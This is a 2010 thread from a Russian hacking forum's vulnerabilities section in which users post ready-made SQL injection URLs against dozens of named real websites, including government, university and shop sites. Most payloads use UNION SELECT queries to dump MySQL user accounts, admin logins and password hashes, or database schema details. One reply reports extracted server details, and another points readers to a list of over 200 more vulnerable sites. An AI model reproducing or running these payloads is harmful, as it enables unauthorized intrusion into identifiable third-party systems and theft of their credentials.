HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.10.2010, 16:09
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию

http://www.blue-keeeber.com/index.php?mod=gallery&list=-219%20union%20select%201,2,3,concat%28user,0x3a,pa ssword,0x3a,file_priv%29,5,6,7,8+from+mysql.user--

PR 3

http://www.unet.edu.ve/unet2001/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat %28user,0x3a,password%29,2+FROM+mysql.user--

PR 6 Cy10

http://www.internetprovsechny.cz/clanek.php?cid=-92+UNION+SELECT+concat%28user,0x3a,password,0x3a,F ile_Priv%29+from+mysql.user--

PR 5 Cy 10

http://bollystic.com/Bollywood/showMovie.php?id=-564%20union%20select%201,2,group_concat%28user,0x3 a,password,0x3a,File_Priv%29,4,5,6,7,8,9,10%20from %20mysql.user--

PR 2

http://www.aries.ro/index.php?lang_id=-1+AND+1=2+UNION+SELECT+group_concat%28user,0x3a,pa ssword,0x3a,File_Priv%29+FROM+mysql.user--

PR 5 Cy 10

http://www.aps.ai/newsstory.php?id=43+and+1=0%20Union%20Select+1,gro up_concat%28user,0x3a,password,0x3C62723E%29,3,4,5 ,6+from+mysql.user

PR 5

http://www.asidoregon.org/newsdetail.php?id=209+AND+1=2+UNION+SELECT+0,group _concat%28user,0x3a,password%29,2,3,4,5,6,7%20from %20tblUsers--

PR 4 Cy 10
 
Ответить с цитированием

  #2  
Старый 18.10.2010, 16:43
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
С нами: 9382468

Репутация: 104
По умолчанию

Код:
http://ecommerce.diocese-kcsj.org/respectlife/view-page.php?Page_ID=-14+union+select+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7--
Database Version: 5.0.77

Database name: 4575_diocese_kcsjorg

User name: 4575_user1282171@lnh-www1h.bluehalo.myregisteredsite.com

OC type: redhat-linux-gnu
 
Ответить с цитированием

  #3  
Старый 18.10.2010, 17:30
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

http://www.dawnnet.org/resources-news.php?id=-170%20/*!union*/%20select%201,2,3,table_name,5,6,7,8,9,0,11,12%20f rom%20information_schema./*!tables*/%20limit%2028,1--%201

http://www.81femmes.org/uk/news.php?id=-121%20union%20select%20version(),2,3,4--%201
 
Ответить с цитированием

  #4  
Старый 18.10.2010, 19:28
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
С нами: 9017758

Репутация: 13
По умолчанию

http://www.alekseykalugin.ru/index.php?togive=think_read&id=17+and+1=0+union+Se lect+concat_ws(0x3a,username,user_password),2,3+fr om+akphpbb_users+limit+1,1+--+

ТИЦ : 230

http://oblmed.nsk.ru/inex1.php?action=read&id=861+and+1=0+UnIon+selECt+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0 x3a,id,username,password),18,19,20,21,22,23,24,25+ From+OblBol_users+limit+0,1+--+&hr=cs_53

ТИЦ : 230

http://safes.ru/show_good.php?idtov=10066'+and+1=0+UnIon+%0A+selEC t+1,2,3,concat_ws(0x3a,username,PASSWORD),5,6,7,8, 9,10,11,12,13,14,15,16,17,18+from+admin+limit+0,1+--+

ТИЦ : 110

http://www.safeburg.ru/cgi-bin/news/view.cgi?news=92'+and+1=0+UnIon+selECt+1,concat_ws (0x3a,ID,USER,LOGIN,PSW),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from +user_access+--+

ТИЦ : 80 PR: 3

http://massage-kreslo.ru/show_good.php?idtov=1061'+and+1=0+UnIon+selECt+1,2 ,3,concat_ws(0x3a,username,password),5,6,7,8,9,10, 11,12,13,14,15,16,17+from+admin+--+

http://arpion.ru/show_good.php?idtov=22312'+and+1=0+UnIon+selECt+1, 2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from +admin+--+

ТИЦ : 70

http://best-carmusic.ru/show_good.php?idtov=3696'+and+1=0+UnIon+selECt+1,2 ,3,concat_ws(0x3a,username,password),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20+from+admin+--+

ТИЦ : 10

http://77tv.ru/show_good.php?idtov=220201'+and+1=0+UnIon+%0A+selE Ct+1,2,3,concat_ws(0x3a,username,password),5,6,7,8 ,9,10,11,12,13,14,15,16,17+from+admin+--+

ТИЦ : 10 PR: 2

http://vremeninet.ru/show_good.php?idtov=1073'+and+1=0+UnIon+%0A+selECt +1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9 ,10,11,12,13,14+from+admin+--+

ТИЦ : 20

itsell.ru/show_good.php?idtov=1101051'+and+1=0+UnIon+selECt+ 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19+from+admin+--+

ТИЦ : 20

----------------------------------------------

Ну а все начелось опять с корявых разроботчиков сайтов ))

http://www.bornet.ru/kl.php , кто хочет поковыряйте . там более 200 бажных сайтов
 
Ответить с цитированием

  #5  
Старый 18.10.2010, 21:35
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

http://www.visitnacogdoches.org/news.php?id=-198' union select 1,table_schema,table_name,table_rows,0x3c68723e,6, 0x3c68723e,8 from information_schema.tables where table_rows>0-- 1

http://www.ummaclinic.org/news.php?id=-21' /*!union*/ select /*!concat*/(table_name),2,3,4,5,6,7,8,9 /*!from*/ information_schema.`tables` limit 38,1-- 1
 
Ответить с цитированием

  #6  
Старый 19.10.2010, 03:19
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
С нами: 9171191

Репутация: 43
По умолчанию

Код:
http://www.lisenok.ru/look.php?id=-99999+union+select+1,2,3,concat_ws%280x3a,login,password,access_level%29,5+from+users--
Тиц 60

http://www.lisenok.ru/login.php
 
Ответить с цитированием

  #7  
Старый 19.10.2010, 10:12
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
С нами: 8467184

Репутация: 1
По умолчанию

http://www.sultanbrunei.com/news_read.asp?id=0x3a+union+select+0,concat%28user %28%29,0x3a,database%28%29,0x3a,version%28%29%29,2 ,3,4,5,6,7,8--

PR 3

http://www.inovasi.lipi.go.id/hki/news/news.php?id=37+AND+1=2+UNION+SELECT+1,2,concat%28u ser,0x3a,password%29,4,concat%28user,0x3a,password %29,concat%28user,0x3a,password%29+FROM+mysql.user--

PR 5

http://www.habibrafiq.com/services.php?id=-22+union+select+0,1,concat%28user,0x3a,pass%29,3,4 ,5+from+admin

PR 3

http://cooksnotebook.com/show.php?id=-999+union+select+1,2,3,concat%28user%28%29,0x3a,ve rsion%28%29,0x3a,database%28%29%29,5,6,7,8--

PR 3

http://www.ceelqaboobe.com/view.php?id=-3561%20union%20select%201,2,3,4,5,concat%28user%28 %29%29,7,8,9,10--

PR 4

http://www.saladillo.gov.ar/informe_prensa_detalle.php?id=322+union+select+0,1 ,2,3,4,5,6,7,concat_ws%28user,0x3a,pass%29,9,10,11 +from+admin

P.S. Этот сайт выкладывали в PHP-inj, вот теперь скуля...

PR 4

http://www.rodonorte.pt/news.php?id=20+and+0=1+union+all+select+0x31,0x32, 0x33,unhex%28hex%28concat%28user%28%29,0x3a,versio n%28%29%29%29%29,0x35,0x36--



PR 6 Cy 10


http://clips.abusora.com/Clip.php?item_id=-25164%20union%20all%20select%201,2,concat%28user%2 8%29,0x3e,version%28%29,0x3e,database%28%29%29,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18--

PR 3

http://www.pc-boost.com/logitheque.php?idCat=11+and+0=1+union+all+select+c oncat%28user%28%29,database%28%29%29

P.S. Выводится белым цветом, поэтому либо выделите всю страницу, либо ищите в коде...

PR 4 CY 10

http://www.intema.gov.ar/curriculum.php?id=-109+union+select+1,2,3,4,5,concat%28user,0x3a,pass %29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25+from+login--



PR 4


http://www.sparkle.ir/products/category.php?id=9+union+select+1,2,concat%28user%2 8%29,version%28%29,database%28%29%29,4,5,6,7,8,9,1 0,11,12,13,14,15

PR 3

http://www.denhelder.nl/index.php?menu_id=60&nieuws_id=-3792+union+all+select+1,2,concat_ws%28user%28%29,0 x3a,database%28%29,0x3a%29,4,5,6,7,8,9,10,11--

PR 5 Cy 10
 
Ответить с цитированием

  #8  
Старый 19.10.2010, 11:51
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию

http://www.toxis.dk/8.0/news.php?id=40' union select 1,2,group_concat(table_name,0x3a,table_rows),4,5,6 ,7,8 from information_schema.tables-- 1

http://www.mesquitelocalnews.com/news.php?id=12)) or 1 group by concat((select table_name from information_schema.tables limit 17,1),floor(rand(0)*2))having min(0) or 1-- 1

http://www.melonfire.com/community/columns/trog/article.php?id=-280 /*!union*/ select 1,2,table_name,4,5,6 from information_schema.`tables`-- 1
 
Ответить с цитированием

  #9  
Старый 19.10.2010, 21:09
Топе
Познающий
Регистрация: 02.10.2010
Сообщений: 70
С нами: 8216246

Репутация: 2
По умолчанию

http://www.shalomhills.com/eventdisplay.php?id=-999+union+select+version(),2,3--
 
Ответить с цитированием

  #10  
Старый 19.10.2010, 23:43
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

http://www.milsetasia.org/milset/showstatic.php?id=4+and+1=0+union+select+version() ,2,3,4,5,6,7&lang=ar
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...